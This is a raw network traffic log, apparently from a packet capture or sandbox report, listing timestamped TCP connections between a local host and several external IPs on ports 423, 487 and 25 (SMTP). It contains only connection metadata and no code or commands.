Sep 5, 2021 15:50:25.041376114 CEST	423	49875	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:25.054261923 CEST	49872	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:25.054780006 CEST	49878	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:25.077378988 CEST	423	49877	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:25.077471018 CEST	49877	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:25.085143089 CEST	423	49878	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:25.085256100 CEST	49878	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:25.085463047 CEST	423	49870	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:25.085540056 CEST	49870	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:25.086095095 CEST	423	49872	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:25.086167097 CEST	49872	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:25.115808010 CEST	423	49878	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:25.116056919 CEST	49878	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:25.146507978 CEST	423	49878	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:25.147500038 CEST	423	49877	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:25.147772074 CEST	49877	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:25.179322958 CEST	49874	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:25.180032969 CEST	49879	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:25.204682112 CEST	423	49874	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:25.204771996 CEST	423	49879	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:25.204783916 CEST	49874	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:25.204883099 CEST	49879	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:25.217096090 CEST	423	49877	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:25.226207972 CEST	49873	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:25.226227045 CEST	49876	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:25.226748943 CEST	49880	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:25.227149963 CEST	49881	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:25.229902029 CEST	423	49879	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:25.230190992 CEST	49879	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:25.255153894 CEST	423	49879	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:25.267745972 CEST	423	49881	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:25.267842054 CEST	49881	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:25.268233061 CEST	423	49876	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:25.268304110 CEST	49876	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:25.288657904 CEST	49875	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:25.289299965 CEST	49882	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:25.296107054 CEST	423	49873	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:25.296195984 CEST	49873	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:25.303186893 CEST	423	49880	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:25.303271055 CEST	49880	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:25.309015036 CEST	423	49881	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:25.309187889 CEST	49881	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:25.349824905 CEST	423	49881	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:25.360153913 CEST	423	49875	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:25.360219002 CEST	49875	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:25.362627029 CEST	423	49882	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:25.362704039 CEST	49882	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:25.379842043 CEST	423	49880	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:25.380047083 CEST	49880	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:25.436456919 CEST	423	49882	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:25.436734915 CEST	49882	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:25.456787109 CEST	423	49880	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:25.460840940 CEST	49877	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:25.460859060 CEST	49878	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:25.461527109 CEST	49883	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:25.462076902 CEST	49884	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:25.489820004 CEST	25	49861	144.160.235.144	192.168.2.4
Sep 5, 2021 15:50:25.491919994 CEST	423	49878	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:25.492512941 CEST	423	49884	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:25.497595072 CEST	49878	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:25.497632980 CEST	49884	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:25.510374069 CEST	423	49882	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:25.514451027 CEST	49861	25	192.168.2.4	144.160.235.144
Sep 5, 2021 15:50:25.528366089 CEST	423	49884	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:25.528527975 CEST	49884	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:25.530242920 CEST	423	49877	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:25.530328035 CEST	49877	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:25.531647921 CEST	423	49883	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:25.531718016 CEST	49883	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:25.559182882 CEST	423	49884	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:25.561511040 CEST	25	49871	66.111.4.73	192.168.2.4
Sep 5, 2021 15:50:25.576206923 CEST	49871	25	192.168.2.4	66.111.4.73
Sep 5, 2021 15:50:25.596807003 CEST	49885	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:25.597560883 CEST	49886	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:25.601149082 CEST	49879	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:25.601485968 CEST	423	49883	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:25.601665974 CEST	49887	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:25.601847887 CEST	49883	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:25.626827955 CEST	423	49879	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:25.626852036 CEST	423	49887	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:25.626903057 CEST	49879	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:25.626983881 CEST	49887	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:25.637231112 CEST	25	49861	144.160.235.144	192.168.2.4
Sep 5, 2021 15:50:25.637254000 CEST	25	49861	144.160.235.144	192.168.2.4
Sep 5, 2021 15:50:25.649105072 CEST	49861	25	192.168.2.4	144.160.235.144
Sep 5, 2021 15:50:25.652019024 CEST	423	49887	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:25.652363062 CEST	49887	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:25.665179968 CEST	487	49886	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:25.665260077 CEST	49886	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:25.671435118 CEST	423	49883	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:25.677175999 CEST	423	49887	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:25.677287102 CEST	25	49871	66.111.4.73	192.168.2.4
Sep 5, 2021 15:50:25.679495096 CEST	25	49871	66.111.4.73	192.168.2.4
Sep 5, 2021 15:50:25.688133001 CEST	49871	25	192.168.2.4	66.111.4.73
Sep 5, 2021 15:50:25.708476067 CEST	25	49885	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:25.708640099 CEST	49885	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:25.710551977 CEST	49881	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:25.751487970 CEST	423	49881	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:25.751549959 CEST	49881	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:25.763186932 CEST	487	49886	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:25.772013903 CEST	25	49861	144.160.235.144	192.168.2.4
Sep 5, 2021 15:50:25.789346933 CEST	25	49871	66.111.4.73	192.168.2.4
Sep 5, 2021 15:50:25.790381908 CEST	25	49871	66.111.4.73	192.168.2.4
Sep 5, 2021 15:50:25.805310011 CEST	49886	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:25.820692062 CEST	49888	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:25.831198931 CEST	49871	25	192.168.2.4	66.111.4.73
Sep 5, 2021 15:50:25.855846882 CEST	49861	25	192.168.2.4	144.160.235.144
Sep 5, 2021 15:50:25.856144905 CEST	25	49885	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:25.861011982 CEST	423	49888	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:25.861098051 CEST	49888	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:25.872908115 CEST	487	49886	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:25.901967049 CEST	423	49888	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:25.902153969 CEST	49888	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:25.907716036 CEST	487	49886	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:25.911739111 CEST	49886	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:25.911780119 CEST	49886	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:25.932373047 CEST	25	49871	66.111.4.73	192.168.2.4
Sep 5, 2021 15:50:25.933686972 CEST	25	49871	66.111.4.73	192.168.2.4
Sep 5, 2021 15:50:25.942614079 CEST	423	49888	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:25.955018044 CEST	49871	25	192.168.2.4	66.111.4.73
Sep 5, 2021 15:50:25.976243019 CEST	49885	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:25.976304054 CEST	49880	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:25.976878881 CEST	49889	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:25.982357025 CEST	25	49861	144.160.235.144	192.168.2.4
Sep 5, 2021 15:50:25.982381105 CEST	487	49886	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:25.982389927 CEST	487	49886	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:25.982465029 CEST	49861	25	192.168.2.4	144.160.235.144
Sep 5, 2021 15:50:26.013747931 CEST	487	49886	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.013958931 CEST	49886	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.014055967 CEST	49886	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.014117956 CEST	49886	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.014166117 CEST	49886	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.014223099 CEST	49886	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.014269114 CEST	49886	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.014312983 CEST	49886	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.014369965 CEST	49886	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.050707102 CEST	423	49889	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:26.050822020 CEST	49889	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:26.056236982 CEST	25	49871	66.111.4.73	192.168.2.4
Sep 5, 2021 15:50:26.056298018 CEST	49871	25	192.168.2.4	66.111.4.73
Sep 5, 2021 15:50:26.081682920 CEST	487	49886	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.082068920 CEST	487	49886	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.082390070 CEST	487	49886	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.082658052 CEST	487	49886	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.085623026 CEST	49882	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:26.086214066 CEST	49890	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:26.089523077 CEST	423	49880	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:26.089585066 CEST	49880	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:26.118686914 CEST	49885	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:26.123770952 CEST	487	49886	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.124010086 CEST	487	49886	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.124066114 CEST	49886	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.124334097 CEST	49886	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.124351978 CEST	423	49889	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:26.124519110 CEST	49889	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:26.157604933 CEST	423	49890	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:26.157731056 CEST	49890	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:26.158881903 CEST	423	49882	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:26.158968925 CEST	49882	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:26.191632032 CEST	487	49886	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.198010921 CEST	423	49889	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:26.229511976 CEST	423	49890	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:26.230246067 CEST	25	49885	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:26.230916023 CEST	25	49885	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:26.263447046 CEST	49885	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:26.263757944 CEST	49890	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:26.263896942 CEST	49884	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:26.264595032 CEST	49891	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:26.294488907 CEST	423	49884	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:26.294637918 CEST	49884	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:26.294940948 CEST	423	49891	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:26.295023918 CEST	49891	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:26.325604916 CEST	423	49891	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:26.325901985 CEST	49891	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:26.335283041 CEST	423	49890	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:26.343822002 CEST	49892	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:26.356312990 CEST	423	49891	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:26.375695944 CEST	25	49885	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:26.375756025 CEST	25	49885	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:26.375890017 CEST	49885	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:26.390461922 CEST	49885	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:26.420821905 CEST	49893	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.429326057 CEST	49883	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:26.429357052 CEST	49887	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:26.429897070 CEST	49894	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:26.430279970 CEST	49895	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:26.437376976 CEST	49896	25	192.168.2.4	148.163.152.7
Sep 5, 2021 15:50:26.437855959 CEST	25	49892	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:26.437943935 CEST	49892	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:26.454379082 CEST	423	49887	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:26.454438925 CEST	49887	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:26.454909086 CEST	423	49895	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:26.454977036 CEST	49895	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:26.479990959 CEST	423	49895	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:26.480215073 CEST	49895	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:26.488221884 CEST	487	49893	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.488317966 CEST	49893	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.499752998 CEST	423	49883	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:26.499857903 CEST	49883	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:26.502121925 CEST	25	49885	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:26.503802061 CEST	423	49894	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:26.503892899 CEST	49894	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:26.504040003 CEST	49888	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:26.504509926 CEST	49897	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:26.505083084 CEST	423	49895	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:26.544747114 CEST	423	49888	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:26.544831991 CEST	49888	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:26.545167923 CEST	423	49897	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:26.545234919 CEST	49897	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:26.556540966 CEST	25	49896	148.163.152.7	192.168.2.4
Sep 5, 2021 15:50:26.556643009 CEST	49896	25	192.168.2.4	148.163.152.7
Sep 5, 2021 15:50:26.577749014 CEST	487	49893	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.577951908 CEST	423	49894	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:26.578100920 CEST	49893	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.578200102 CEST	49894	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:26.586379051 CEST	423	49897	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:26.586584091 CEST	49897	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:26.627374887 CEST	423	49897	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:26.645385981 CEST	487	49893	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.652053118 CEST	423	49894	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:26.681751966 CEST	487	49893	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.685755968 CEST	49893	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.685858011 CEST	49893	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.690675020 CEST	49898	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:26.698765993 CEST	25	49896	148.163.152.7	192.168.2.4
Sep 5, 2021 15:50:26.716121912 CEST	49896	25	192.168.2.4	148.163.152.7
Sep 5, 2021 15:50:26.717838049 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:26.717915058 CEST	49898	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:26.746949911 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:26.753097057 CEST	487	49893	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.753117085 CEST	487	49893	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.787194967 CEST	487	49893	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.808621883 CEST	49893	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.808840990 CEST	49893	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.809006929 CEST	49893	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.809160948 CEST	49893	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.809351921 CEST	49893	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.809545994 CEST	49893	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.809676886 CEST	49893	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.809809923 CEST	49893	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.809931993 CEST	49893	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.836920977 CEST	25	49896	148.163.152.7	192.168.2.4
Sep 5, 2021 15:50:26.836951971 CEST	25	49896	148.163.152.7	192.168.2.4
Sep 5, 2021 15:50:26.836965084 CEST	25	49896	148.163.152.7	192.168.2.4
Sep 5, 2021 15:50:26.837064028 CEST	49896	25	192.168.2.4	148.163.152.7
Sep 5, 2021 15:50:26.840686083 CEST	49896	25	192.168.2.4	148.163.152.7
Sep 5, 2021 15:50:26.875257969 CEST	49898	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:26.876094103 CEST	487	49893	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.876372099 CEST	487	49893	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.876781940 CEST	487	49893	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.877131939 CEST	487	49893	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.877675056 CEST	49899	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:26.882507086 CEST	49889	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:26.883007050 CEST	49900	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:26.902687073 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:26.907813072 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:26.943742990 CEST	487	49893	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.956162930 CEST	423	49900	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:26.956291914 CEST	49900	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:26.956628084 CEST	423	49889	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:26.956696033 CEST	49889	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:26.960345984 CEST	487	49893	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:26.960458994 CEST	49893	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:26.971719027 CEST	25	49899	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:26.971843004 CEST	49899	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:26.991882086 CEST	49898	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:27.029932976 CEST	423	49900	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:27.039338112 CEST	49900	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:27.042707920 CEST	49893	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:27.048211098 CEST	49898	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:27.075766087 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:27.110001087 CEST	487	49893	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:27.112534046 CEST	423	49900	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:27.195017099 CEST	49898	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:27.273211956 CEST	49890	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:27.273237944 CEST	49891	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:27.273778915 CEST	49901	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:27.274226904 CEST	49902	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:27.304121971 CEST	423	49891	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:27.304208994 CEST	49891	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:27.305732012 CEST	423	49902	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:27.305833101 CEST	49902	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:27.337852001 CEST	423	49902	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:27.339071989 CEST	49902	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:27.344602108 CEST	423	49890	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:27.344681978 CEST	49890	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:27.345185995 CEST	423	49901	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:27.345318079 CEST	49901	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:27.370735884 CEST	423	49902	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:27.417009115 CEST	423	49901	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:27.417241096 CEST	49901	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:27.431224108 CEST	49898	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:27.463005066 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:27.488858938 CEST	423	49901	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:27.507966042 CEST	49895	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:27.508508921 CEST	49903	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:27.533598900 CEST	423	49895	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:27.533654928 CEST	25	49892	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:27.533699989 CEST	49895	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:27.533736944 CEST	423	49903	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:27.533827066 CEST	49903	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:27.546279907 CEST	49892	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:27.559169054 CEST	423	49903	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:27.559375048 CEST	49903	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:27.584505081 CEST	423	49903	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:27.585774899 CEST	49894	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:27.585803032 CEST	49897	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:27.586298943 CEST	49904	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:27.586703062 CEST	49905	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:27.588529110 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:27.621047974 CEST	49898	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:27.627254009 CEST	423	49897	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:27.627307892 CEST	423	49905	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:27.627423048 CEST	49897	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:27.627475023 CEST	49905	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:27.640290022 CEST	25	49892	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:27.641469002 CEST	25	49892	66.111.4.74	192.168.2.4
Sep 5, 2021 15:50:27.648318052 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:27.649060965 CEST	25	49898	108.177.119.26	192.168.2.4
Sep 5, 2021 15:50:27.653912067 CEST	423	49904	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:27.654057026 CEST	49904	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:27.659617901 CEST	423	49894	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:27.659751892 CEST	49894	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:27.668591976 CEST	423	49905	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:27.674599886 CEST	49905	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:27.710696936 CEST	49892	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:27.711157084 CEST	49898	25	192.168.2.4	108.177.119.26
Sep 5, 2021 15:50:27.715199947 CEST	423	49905	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:27.721677065 CEST	423	49904	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:27.734045982 CEST	49892	25	192.168.2.4	66.111.4.74
Sep 5, 2021 15:50:27.734214067 CEST	49904	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:27.801584005 CEST	423	49904	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:27.828078985 CEST	25	49892	66.111.4.74	192.168.2.4
